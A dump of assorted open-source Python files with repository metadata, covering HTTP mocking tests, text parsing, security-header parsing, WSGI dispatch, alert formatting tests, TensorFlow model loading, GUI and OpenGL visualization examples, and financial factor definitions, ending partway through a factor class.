max_stars_repo_path stringlengths 4-245 | max_stars_repo_name stringlengths 7-115 | max_stars_count int64 101-368k | id stringlengths 2-8 | content stringlengths 6-1.03M
---|---|---|---|---|
tests/bugfixes/nosetests/test_redis.py | kerokim/HTTPretty | 1,253 | 12717328 | import os
import requests
import httpretty
try:
from redis import Redis
except ImportError:
Redis = None
from unittest import skipUnless
def redis_available():
if Redis is None:
return False
params = dict(
host=os.getenv('REDIS_HOST') or '127.0.0.1',
port=int(os.getenv('REDIS_PORT') or 6379)
)
conn = Redis(**params)
try:
conn.keys('*')
conn.close()
return True
except Exception:
return False
@skipUnless(redis_available(), reason='no redis server available for test')
@httpretty.activate()
def test_work_in_parallel_to_redis():
"HTTPretty should passthrough redis connections"
redis = Redis()
keys = redis.keys('*')
for key in keys:
redis.delete(key)
redis.append('item1', 'value1')
redis.append('item2', 'value2')
sorted(redis.keys('*')).should.equal([b'item1', b'item2'])
httpretty.register_uri(
httpretty.GET,
"http://redis.io",
body="salvatore")
response = requests.get('http://redis.io')
response.text.should.equal('salvatore')
|
nlpre/identify_parenthetical_phrases.py | thoppe/NLPre | 186 | 12717330 | import collections
from .Grammars import parenthesis_nester
import logging
import string
class identify_parenthetical_phrases(object):
"""
Parser to identify abbreviations of phrases found in a parenthesis, ex.
Health and Human Services (HHS) and Office of the Director (OD).
"""
def __init__(self):
""" Initialize the parser. """
self.parser = parenthesis_nester()
self.logger = logging.getLogger(__name__)
def __call__(self, text):
"""
Runs the parser. Returns a count of how often the phrases are
used in the document.
Args:
text: a string document
Returns:
results: A collections.counter object
"""
text = text.replace("-", " ")
text = text.replace("'", "")
text = text.replace('"', "")
tokens = self.parser(text)
results = collections.Counter()
for k, item in enumerate(tokens):
word = self._is_valid_abbr(item)
if word:
subtokens = self._check_matching(word, k, tokens)
if subtokens:
results[(tuple(subtokens), word)] += 1
if results:
self.logger.info("Counter: %s" % results)
return results
def _is_valid_abbr(self, item):
"""
Args:
item: a list of tokens
Returns:
word: the abbreviation, a string token
"""
if isinstance(item, str):
return False
if len(item) != 1:
return False
word = item[0]
# Break if we are doubly nested
if not isinstance(word, str):
return False
# Check if there are any capital letters
if word.lower() == word:
return False
return word
def _check_matching(self, word, k, tokens):
"""
Args:
word: a string
k: the position of the word in tokens, an int
tokens: a list of strings
Returns:
subtokens: a tuple of string tokens of the abbreviated phrase
"""
# Identify the capital letters
caps = [let for let in word if let in string.ascii_uppercase.upper()]
# Don't try to match with only a single letter (too noisy!)
if len(caps) < 2:
return False
# This may fail if used too early in doc or if nested parens
# this shouldn't be a match so it's OK!
# try:
# subtokens = tokens[k - len(caps):k]
# subtoken_let = [let.upper()[0] for let in subtokens]
# except:
# return False
subtokens = tokens[k - len(caps) : k]
subtoken_let = [
let.upper()[0] for let in subtokens if isinstance(let, str)
]
"""
If the subtokens don't provide a perfect match of the abbreviation,
we must check if there are filler words, i.e. "Health and Human
Services (HHS)" doesn't provide a match above because "and" isn't
represented in the abbreviation. To account for this we iterate
backwards from the abbreviation, trying to reconstruct the
abbreviation by ignoring filler words.
"""
if subtoken_let != caps:
tokens_to_remove = [
"and",
"of",
"with",
"&",
"or",
"for",
"the",
"to",
]
subtokens = []
x = k - 1
cutoff = x - len(caps) * 2
while subtoken_let != caps:
if x < 0 or x < cutoff:
return False
token = tokens[x]
if isinstance(token, str):
subtokens.insert(0, token)
subtoken_let = [
let.upper()[0]
for let in subtokens
if let not in tokens_to_remove
]
x -= 1
else:
x -= 1
cutoff -= 1
continue
return tuple(subtokens)
# if __name__ == "__main__":
# Right now, two of three of these phrases are correctly found.
# P = identify_parenthetical_phrases()
# text = ("The Environmental Protection Agency (EPA) is not a government "
# "organization (GO) of Health and Human Services (HHS).")
# print(P(text))
|
securityheaders/models/xxssprotection/xxssprotection.py | th3cyb3rc0p/securityheaders | 151 | 12717345 | from securityheaders.models import SecurityHeader
from securityheaders.models.xxssprotection import XXSSProtectionDirective
from securityheaders.models.annotations import *
@requiredheader
@description('This header sets the configuration for the cross-site scripting filter built into most browsers. The recommended value is "X-XSS-Protection: 1; mode=block"')
@headername('x-xss-protection')
@headerref('https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/dd565647(v=vs.85)')
class XXSSProtection(SecurityHeader):
directive = XXSSProtectionDirective
def __init__(self, unparsedstring):
SecurityHeader.__init__(self, unparsedstring, XXSSProtectionDirective)
def one(self):
try:
return XXSSProtectionDirective.ONE in self.parsedstring
except Exception:
return False
def zero(self):
try:
return XXSSProtectionDirective.ZERO in self.parsedstring
except Exception:
return False
def mode(self):
result = None
if self.parsedstring and XXSSProtectionDirective.MODE in self.parsedstring:
if isinstance(self.parsedstring[XXSSProtectionDirective.MODE], list):
if len(self.parsedstring[XXSSProtectionDirective.MODE]) > 0:
result = self.parsedstring[XXSSProtectionDirective.MODE][0]
else:
result = ""
else:
result = self.parsedstring[XXSSProtectionDirective.MODE]
return result
def report(self):
result = None
if self.parsedstring and XXSSProtectionDirective.REPORT in self.parsedstring:
if isinstance(self.parsedstring[XXSSProtectionDirective.REPORT], list):
if len(self.parsedstring[XXSSProtectionDirective.REPORT]) > 0:
result = self.parsedstring[XXSSProtectionDirective.REPORT][0]
else:
result = ""
else:
result = self.parsedstring[XXSSProtectionDirective.REPORT]
return result
|
controller/deis/wsgi.py | yun-an/deis | 3,375 | 12717346 | <reponame>yun-an/deis
"""
WSGI config for deis project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
"""
from __future__ import unicode_literals
import os
from django.core.wsgi import get_wsgi_application
import static
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "deis.settings")
class Dispatcher(object):
"""
Dispatches requests between two WSGI apps, a static file server and a
Django server.
"""
def __init__(self):
self.django_handler = get_wsgi_application()
self.static_handler = static.Cling(os.path.dirname(os.path.dirname(__file__)))
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith('/static'):
return self.static_handler(environ, start_response)
else:
return self.django_handler(environ, start_response)
application = Dispatcher()
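# Illustrative usage sketch, not part of the original Deis file: because
# ``application`` is a plain WSGI callable, any WSGI server can host it. The
# stdlib reference server and the port below are arbitrary choices made for
# this example.
if __name__ == '__main__':
    from wsgiref.simple_server import make_server
    # Serve the dispatcher locally; static assets and Django views are routed
    # by Dispatcher.__call__ above.
    make_server('', 8000, application).serve_forever()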
|
tests/test_json_fields.py | trevorbox/prom2teams | 180 | 12717354 | import unittest
import os
import json
from prom2teams.teams.alert_mapper import map_prom_alerts_to_teams_alerts
from prom2teams.prometheus.message_schema import MessageSchema
from prom2teams.app.sender import AlertSender
from deepdiff import DeepDiff
class TestJSONFields(unittest.TestCase):
TEST_CONFIG_FILES_PATH = './tests/data/json_files/'
def test_json_with_all_fields(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertNotIn('unknown', str(alert))
def test_json_without_mandatory_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_mandatory_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertIn('unknown', str(alert))
def test_json_without_optional_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_optional_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertIn("'description': 'unknown'", str(alert))
def test_json_without_instance_field(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_instance_field.json')) as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertEqual('unknown', str(alert['instance']))
def test_fingerprint(self):
with open(self.TEST_CONFIG_FILES_PATH + 'all_ok.json') as json_data:
json_received = json.load(json_data)
alerts = MessageSchema().load(json_received)
alert = map_prom_alerts_to_teams_alerts(alerts)[0]
self.assertEqual('dd19ae3d4e06ac55', str(alert['fingerprint']))
def test_without_fingerprint(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'without_fingerprint.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_without_fingerprint.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
self.assertEqual(json_rendered.keys(), json_expected.keys())
def test_compose_all(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_common_items(self):
self.maxDiff = None
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'with_common_items.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_with_common_items.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
self.assertEqual(json_rendered.keys(), json_expected.keys())
def test_grouping_multiple_alerts(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_multiple.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_multiple.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = AlertSender(group_alerts_by='name')._create_alerts(alerts)[0].replace("\n\n\n", " ")
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_extra_labels(self):
excluded_labels = ('pod_name', )
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_extra_labels.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_extra_labels.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema(exclude_fields=excluded_labels).load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_extra_annotations(self):
excluded_annotations = ('message', )
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_extra_annotations.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_extra_annotations.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema(exclude_annotations=excluded_annotations).load(json_received)
rendered_data = AlertSender()._create_alerts(alerts)[0]
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
def test_with_too_long_payload(self):
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'all_ok_multiple.json')) as json_data:
with open(os.path.join(self.TEST_CONFIG_FILES_PATH, 'teams_alert_all_ok_splitted.json')) as expected_data:
json_received = json.load(json_data)
json_expected = json.load(expected_data)
alerts = MessageSchema().load(json_received)
rendered_data = '[' + ','.join([a.replace("\n\n\n", " ") for a in AlertSender(group_alerts_by='name', teams_client_config={'MAX_PAYLOAD': 800})._create_alerts(alerts)]) + ']'
json_rendered = json.loads(rendered_data)
diff = DeepDiff(json_rendered, json_expected, ignore_order=True)
self.assertTrue(not diff)
if __name__ == '__main__':
unittest.main()
|
paas-ce/paas/login/ee_official_login/oauth/google/backends.py | renmcc/bk-PaaS | 767 | 12717362 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
from common.log import logger
from .utils import get_access_token, get_scope_data
class OauthBackend(ModelBackend):
"""
Custom authentication method
"""
def authenticate(self, code=None):
# Google login verification
try:
# Call the API to verify the login ticket CODE and obtain an access_token
access_token = get_access_token(code)
if not access_token:
return None
# Fetch user info via the access_token
userinfo = get_scope_data(access_token)
if not userinfo:
return None
# Verification passed
username = userinfo.get('username')
# Get the User model class
user_model = get_user_model()
# Get or create the User object, and set user info and roles as needed
try:
user = user_model.objects.get(username=username)
except user_model.DoesNotExist:
# Create the User object
user = user_model.objects.create_user(username)
# Fetch user info; it is only set on first creation and not updated if the user already exists
chname = userinfo.get('chname', '')
phone = userinfo.get('phone', '')
email = userinfo.get('email', '')
user.chname = chname
user.phone = phone
user.email = email
user.save()
# note: user roles can be set as needed, user_model.objects.modify_user_role(...)
# note: user info, roles, etc. can also be updated on every login as needed
return user
except Exception:
logger.exception("Google login backend validation error!")
return None
|
waveform_analysis/weighting_filters/__init__.py | pirun/waveform_analysis | 125 | 12717421 | <reponame>pirun/waveform_analysis<filename>waveform_analysis/weighting_filters/__init__.py
from .ABC_weighting import *
from .ITU_R_468_weighting import *
|
TensorFlow_v1/test_pb.py | leimao/Graph_Frozen_Load_TensorFlow | 200 | 12717424 | <reponame>leimao/Graph_Frozen_Load_TensorFlow<gh_stars>100-1000
import tensorflow as tf
import numpy as np
import argparse
from cifar import CIFAR10
from utils import model_accuracy
from tensorflow.python.framework import tensor_util
# If load from pb, you may have to use get_tensor_by_name heavily.
class CNN(object):
def __init__(self, model_filepath):
# The file path of model
self.model_filepath = model_filepath
# Initialize the model
self.load_graph(model_filepath=self.model_filepath)
def load_graph(self, model_filepath):
'''
Load trained model.
'''
print('Loading model...')
self.graph = tf.Graph()
with tf.gfile.GFile(model_filepath, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
print('Check out the input placeholders:')
nodes = [
n.name + ' => ' + n.op for n in graph_def.node
if n.op in ('Placeholder')
]
for node in nodes:
print(node)
with self.graph.as_default():
# Define input tensor
self.input = tf.placeholder(np.float32,
shape=[None, 32, 32, 3],
name='input')
self.dropout_rate = tf.placeholder(tf.float32,
shape=[],
name='dropout_rate')
tf.import_graph_def(graph_def, {
'input': self.input,
'dropout_rate': self.dropout_rate
})
self.graph.finalize()
print('Model loading complete!')
# Get layer names
layers = [op.name for op in self.graph.get_operations()]
for layer in layers:
print(layer)
"""
# Check out the weights of the nodes
weight_nodes = [n for n in graph_def.node if n.op == 'Const']
for n in weight_nodes:
print("Name of the node - %s" % n.name)
# print("Value - " )
# print(tensor_util.MakeNdarray(n.attr['value'].tensor))
"""
# In this version, tf.InteractiveSession and tf.Session could be used interchangeably.
# self.sess = tf.InteractiveSession(graph = self.graph)
self.sess = tf.Session(graph=self.graph)
def test(self, data):
# Know your output node name
output_tensor = self.graph.get_tensor_by_name("import/cnn/output:0")
output = self.sess.run(output_tensor,
feed_dict={
self.input: data,
self.dropout_rate: 0
})
return output
def test_from_frozen_graph(model_filepath):
tf.reset_default_graph()
# Load CIFAR10 dataset
cifar10 = CIFAR10()
x_test = cifar10.x_test
y_test = cifar10.y_test
y_test_onehot = cifar10.y_test_onehot
num_classes = cifar10.num_classes
input_size = cifar10.input_size
# Test 500 samples
x_test = x_test[0:500]
y_test = y_test[0:500]
model = CNN(model_filepath=model_filepath)
test_prediction_onehot = model.test(data=x_test)
test_prediction = np.argmax(test_prediction_onehot, axis=1).reshape(
(-1, 1))
test_accuracy = model_accuracy(label=y_test, prediction=test_prediction)
print('Test Accuracy: %f' % test_accuracy)
def main():
model_pb_filepath_default = './model/cifar10_cnn.pb'
# Argparser
parser = argparse.ArgumentParser(
description='Load and test model from frozen graph pb file.')
parser.add_argument('--model_pb_filepath',
type=str,
help='model pb-format frozen graph file filepath',
default=model_pb_filepath_default)
argv = parser.parse_args()
model_pb_filepath = argv.model_pb_filepath
test_from_frozen_graph(model_filepath=model_pb_filepath)
if __name__ == '__main__':
main()
|
examples/subs.py | tgolsson/appJar | 666 | 12717466 | <reponame>tgolsson/appJar
import sys
sys.path.append("../")
from appJar import gui
def login(btn):
app.hideSubWindow("Login")
app.show()
def stopSub(btn=None):
return False
app = gui()
app.addLabel("la", "la")
app.startSubWindow("Login")
app.setStopFunction(stopSub)
app.addLabel("l2", "Login Window")
app.addButton("SUBMIT", login)
app.stopSubWindow()
app.startSubWindow("Other")
app.addLabel("l3", "Other Window")
app.stopSubWindow()
app.addButton("Other", app.showSubWindow)
app.go(startWindow="Login")
|
release/stubs.min/Autodesk/Revit/DB/Structure/__init___parts/AnalyticalRigidLinksOption.py | htlcnn/ironpython-stubs | 182 | 12717475 | class AnalyticalRigidLinksOption(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies how Rigid Links will be made for the Analytical Model.
enum AnalyticalRigidLinksOption,values: Disabled (1),Enabled (0),FromColumn (2)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Disabled=None
Enabled=None
FromColumn=None
value__=None
|
tests/test_img_path_utils.py | weblucas/mseg-semantic | 391 | 12717477 | #!/usr/bin/python3
from pathlib import Path
from mseg_semantic.utils.img_path_utils import (
dump_relpath_txt,
get_unique_stem_from_last_k_strs
)
_ROOT = Path(__file__).resolve().parent
def test_dump_relpath_txt():
""" """
jpg_dir = f'{_ROOT}/test_data/test_imgs_relpaths'
txt_output_dir = f'{_ROOT}/test_data/temp_files'
txt_save_fpath = dump_relpath_txt(jpg_dir, txt_output_dir)
lines = open(txt_save_fpath).readlines()
lines = [line.strip() for line in lines]
gt_lines = [
'0016E5_08159.png',
'ADE_train_00000001.jpg'
]
assert gt_lines == lines
def test_get_unique_stem_from_last_k_strs_k1():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=1)
assert new_fname == '_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k2():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=2)
assert new_fname == 'aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k3():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=3)
assert new_fname == 'a_aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k4():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=4)
assert new_fname == 'training_a_aiport_terminal_ADE_train_00000001_seg'
def test_get_unique_stem_from_last_k_strs_k5():
""" """
fpath = 'ADE20K_2016_07_26/images/training/a/aiport_terminal/ADE_train_00000001_seg.png'
k = 1
new_fname = get_unique_stem_from_last_k_strs(fpath, k=5)
assert new_fname == 'images_training_a_aiport_terminal_ADE_train_00000001_seg'
if __name__ == '__main__':
""" """
test_dump_relpath_txt()
test_get_unique_stem_from_last_k_strs_k1()
test_get_unique_stem_from_last_k_strs_k2()
test_get_unique_stem_from_last_k_strs_k3()
test_get_unique_stem_from_last_k_strs_k4()
test_get_unique_stem_from_last_k_strs_k5()
|
programs/pyeos/tests/python/rpctest/rpctest.py | learnforpractice/pyeos | 144 | 12717500 | from eoslib import *
code = N('rpctest')
def sayHello():
n = N('rpctest')
id = N('name')
name = read_action()
print('hello', name)
itr = db_find_i64(n, n, n, id)
if itr >= 0: # value exist, update it
old_name = db_get_i64(itr)
print('hello,', old_name)
db_update_i64(itr, n, name)
else:
db_store_i64(n, n, n, id, name)
def test():
n = N('rpctest')
id = N('name')
name = read_action()
print('hello', name)
itr = db_find_i64(n, n, n, id)
if itr >= 0: # value exist, update it
old_name = db_get_i64(itr)
print('hello,', old_name)
else:
print('not found!')
def apply(receiver, code, action):
if action == N('sayhello'):
msg = read_action()
key = N('hellooo')
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
itr = db_find_i64(code, code, code, key)
print('find 1: ', itr)
while itr >= 0:
db_remove_i64(itr)
itr = db_find_i64(code, code, code, key)
print('find 2:', itr)
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
itr = db_store_i64(code, code, code, key, msg)
print('store: ', itr)
if itr != -1:
ret = db_get_i64(itr)
print('ret: ', ret)
itr = db_end_i64(code, code, code)
print('end: ', itr)
while itr != -1:
itr, primary = db_previous_i64(itr)
if itr < 0:
break
print('previous: ', itr, n2s(primary), db_get_i64(itr))
# print('read_action:', read_action())
# sayHello()
|
gen2-triangulation/visualizer.py | ibaiGorordo/depthai-experiments | 381 | 12717515 | import pygame
from pygame.locals import DOUBLEBUF, OPENGL, RESIZABLE
import math
import numpy as np
from OpenGL.GL import glLineWidth, glBegin, GL_LINES, glColor3f, glVertex3fv, glEnd, glPointSize, GL_POINTS, glVertex3f, \
glScaled, GLfloat, glGetFloatv, GL_MODELVIEW_MATRIX, glRotatef, glTranslatef, glClear, GL_COLOR_BUFFER_BIT, \
GL_DEPTH_BUFFER_BIT
from OpenGL.GLU import gluPerspective
lastPosX = 0
lastPosY = 0
zoomScale = 1.0
dataL = 0
xRot = 0
yRot = 0
zRot = 0
def landmark_visualizer(landmarks, cameras, left_landmarks, right_landmarks):
glLineWidth(1.5)
glBegin(GL_LINES)
glColor3f(0.0, 1.0, 0.0)
for landmark in landmarks:
glVertex3fv(cameras[0])
glVertex3fv(landmark)
glColor3f(0.0, 0.0, 1.0)
for landmark in landmarks:
glVertex3fv(cameras[1])
glVertex3fv(landmark)
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(landmarks)):
glVertex3f(landmarks[i][0], landmarks[i][1], landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(cameras)):
glVertex3f(cameras[i][0], cameras[i][1], cameras[i][2])
glEnd()
glLineWidth(1.5)
glBegin(GL_LINES)
glColor3f(0.0, 1.0, 0.0)
for landmark in left_landmarks:
glVertex3fv(cameras[0])
glVertex3fv(landmark)
glColor3f(0.0, 0.0, 1.0)
for landmark in right_landmarks:
glVertex3fv(cameras[1])
glVertex3fv(landmark)
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(left_landmarks)):
glVertex3f(left_landmarks[i][0], left_landmarks[i][1], left_landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(right_landmarks)):
glVertex3f(right_landmarks[i][0], right_landmarks[i][1], right_landmarks[i][2])
glEnd()
glPointSize(3.0)
glBegin(GL_POINTS)
glColor3f(1.0, 0.0, 0.0)
for i in range(len(cameras)):
glVertex3f(cameras[i][0], cameras[i][1], cameras[i][2])
glEnd()
def mouseMove(event):
global lastPosX, lastPosY, zoomScale, xRot, yRot, zRot
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 4:
glScaled(1.05, 1.05, 1.05)
elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 5:
glScaled(0.95, 0.95, 0.95)
if event.type == pygame.MOUSEMOTION:
x, y = event.pos
dx = x - lastPosX
dy = y - lastPosY
mouseState = pygame.mouse.get_pressed()
if mouseState[0]:
modelView = (GLfloat * 16)()
mvm = glGetFloatv(GL_MODELVIEW_MATRIX, modelView)
temp = (GLfloat * 3)()
temp[0] = modelView[0] * dy + modelView[1] * dx
temp[1] = modelView[4] * dy + modelView[5] * dx
temp[2] = modelView[8] * dy + modelView[9] * dx
norm_xy = math.sqrt(temp[0] * temp[0] + temp[1] * temp[1] + temp[2] * temp[2])
glRotatef(math.sqrt(dx * dx + dy * dy), temp[0] / norm_xy, temp[1] / norm_xy, temp[2] / norm_xy)
lastPosX = x
lastPosY = y
def initialize_OpenGL():
pygame.init()
display = (300, 300)
pygame.display.set_mode(display, DOUBLEBUF | OPENGL, RESIZABLE)
gluPerspective(45, (1.0 * display[0] / display[1]), 0.1, 50.0)
glTranslatef(0.0, 0.0, -5)
def start_OpenGL(landmarks, cameras, left_landmarks, right_landmarks):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
mouseMove(event)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
landmark_visualizer(landmarks, cameras, left_landmarks, right_landmarks)
pygame.display.flip()
pygame.time.wait(1)
def get_vector_direction(camera_position, landmark):
vector = []
for i in range(3):
vector.append(landmark[i] - camera_position[i])
return np.array(vector)
def get_vector_intersection(left_vector, left_camera_position, right_vector, right_camera_position):
n = np.cross(left_vector, right_vector)
n1 = np.cross(left_vector, n)
n2 = np.cross(right_vector, n)
top = np.dot(np.subtract(right_camera_position, left_camera_position), n2)
bottom = np.dot(left_vector, n2)
divided = top / bottom
mult = divided * left_vector
c1 = left_camera_position + mult
top = np.dot(np.subtract(left_camera_position, right_camera_position), n1)
bottom = np.dot(right_vector, n1)
divided = top / bottom
mult = divided * right_vector
c2 = right_camera_position + mult
center = (c1 + c2) / 2
return center
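if __name__ == '__main__':
    # Illustrative sketch, not part of the original demo: triangulate a single
    # point from two cameras using the helpers above. The camera positions and
    # the landmark are made-up coordinates chosen so the two viewing rays
    # intersect exactly at the landmark.
    left_cam = np.array([-1.0, 0.0, 0.0])
    right_cam = np.array([1.0, 0.0, 0.0])
    true_point = np.array([0.25, 0.5, 2.0])
    left_dir = get_vector_direction(left_cam, true_point)
    right_dir = get_vector_direction(right_cam, true_point)
    # Should print approximately [0.25 0.5 2.0]
    print(get_vector_intersection(left_dir, left_cam, right_dir, right_cam))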
|
3d/scripts/generate_snapshot.py | chrisdearman/splitflap | 2,138 | 12717575 | #!/usr/bin/env python
# Copyright 2015-2016 <NAME> and the splitflap contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from __future__ import print_function
import errno
import logging
import os
import openscad
logging.basicConfig(level=logging.DEBUG)
output_folder = os.path.join('build')
try:
os.makedirs(output_folder)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(output_folder):
pass
else:
raise
openscad.run(
'splitflap.scad',
os.path.join(output_folder, 'snapshot.png'),
output_size = [1280, 1024],
camera_translation = [0, 0, 0],
camera_rotation = [60, 0, 135],
camera_distance = 600,
colorscheme = 'Nature',
)
|
spectre/factors/feature.py | rajach/spectre | 302 | 12717596 | <reponame>rajach/spectre
"""
@author: Heerozh (<NAME>)
@copyright: Copyright 2019-2020, Heerozh. All rights reserved.
@license: Apache 2.0
@email: <EMAIL>
"""
import warnings
from .datafactor import DatetimeDataFactor
from .factor import CrossSectionFactor, CustomFactor
from .basic import Returns
from ..parallel import nanstd, nanmean, nansum
# ----------- Common Market Features -----------
class MarketDispersion(CrossSectionFactor):
"""Cross-section standard deviation of universe stocks returns."""
inputs = (Returns(), )
win = 1
def compute(self, returns):
ret = nanstd(returns, dim=1).unsqueeze(-1)
return ret.repeat(1, returns.shape[1])
class MarketReturn(CrossSectionFactor):
"""Cross-section mean returns of universe stocks."""
inputs = (Returns(), )
win = 1
def compute(self, returns):
ret = nanmean(returns, dim=1).unsqueeze(-1)
return ret.repeat(1, returns.shape[1])
class MarketVolatility(CustomFactor):
"""MarketReturn Rolling standard deviation."""
inputs = (MarketReturn(), 252)
win = 252
_min_win = 2
def compute(self, returns, annualization_factor):
return (returns.nanvar() * annualization_factor) ** 0.5
class AdvanceDeclineRatio(CrossSectionFactor):
"""Need to work with MA, and could be applied to volume too"""
inputs = (Returns(), )
win = 1
def compute(self, returns):
